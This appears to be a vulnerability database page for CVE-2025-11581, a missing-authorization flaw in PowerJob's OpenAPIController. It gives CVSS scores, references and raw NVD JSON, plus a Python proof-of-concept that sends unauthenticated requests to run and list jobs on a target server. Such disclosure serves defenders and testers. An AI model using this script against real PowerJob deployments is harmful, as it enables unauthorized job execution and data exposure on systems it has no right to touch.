CVE-2025-11581

Description

A security vulnerability has been detected in PowerJob up to 5.1.2. This vulnerability affects unknown code of the file /openApi/runJob of the component OpenAPIController. Such manipulation leads to missing authorization. The attack can be launched remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:powerjob:powerjob:*:*:*:*:*:*:*:* - VULNERABLE

PowerJob < 5.1.3

PowerJob <= 5.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11581 PoC - PowerJob OpenAPIController Missing Authorization
# Target: PowerJob <= 5.1.2
# Endpoint: /openApi/runJob

import requests

# Target PowerJob server URL
TARGET_URL = "http://target-powerjob-server:7700"

# Step 1: Trigger job execution via unauthorized API call
# The /openApi/runJob endpoint lacks authentication validation
def exploit_run_job(app_id, job_params=None):
    """
    Exploit missing authorization in PowerJob OpenAPIController.
    No authentication credentials required.
    """
    endpoint = f"{TARGET_URL}/openApi/runJob"

    # Payload to trigger job execution
    payload = {
        "appId": app_id,        # Target application ID in PowerJob
        "jobId": None,           # Optional: specific job ID
        "params": job_params or {},  # Job parameters
        "delay": 0               # Execution delay in seconds
    }

    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }

    # Send unauthorized request - no token or auth header needed
    response = requests.post(
        endpoint,
        json=payload,
        headers=headers,
        timeout=10
    )

    print(f"[+] Status Code: {response.status_code}")
    print(f"[+] Response: {response.text}")
    return response

# Step 2: Enumerate available jobs via openApi
def enumerate_jobs(app_id):
    """Enumerate available jobs through unauthorized API access."""
    endpoint = f"{TARGET_URL}/openApi/listJobs"
    params = {"appId": app_id}

    response = requests.get(endpoint, params=params, timeout=10)
    print(f"[+] Available Jobs: {response.text}")
    return response

# Main execution
if __name__ == "__main__":
    # Replace with actual target app ID
    APP_ID = 1

    print(f"[*] Targeting: {TARGET_URL}")
    print("[*] Exploiting CVE-2025-11581 - Missing Authorization\n")

    # Trigger unauthorized job execution
    exploit_run_job(APP_ID, job_params={"key": "value"})

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11581
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11581
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11581/
[4] VulDB https://vuldb.com/cve/CVE-2025-11581
[5] https://github.com/PowerJob/PowerJob/
[6] https://github.com/PowerJob/PowerJob/issues/1128
[7] https://vuldb.com/?ctiid.327903
[8] https://vuldb.com/?id.327903
[9] https://vuldb.com/?submit.662558

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11581", "sourceIdentifier": "[email protected]", "published": "2025-10-10T19:15:36.960", "lastModified": "2026-02-24T08:16:14.697", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in PowerJob up to 5.1.2. This vulnerability affects unknown code of the file /openApi/runJob of the component OpenAPIController. Such manipulation leads to missing authorization. The attack can be launched remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:powerjob:powerjob:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.1.2", "matchCriteriaId": "E5FA69FA-D7F8-41C6-9B42-B60767FECF53"}]}]}], "references": [{"url": "https://github.com/PowerJob/PowerJob/", "source": "[email protected]"}, {"url": "https://github.com/PowerJob/PowerJob/issues/1128", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327903", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327903", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.662558", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}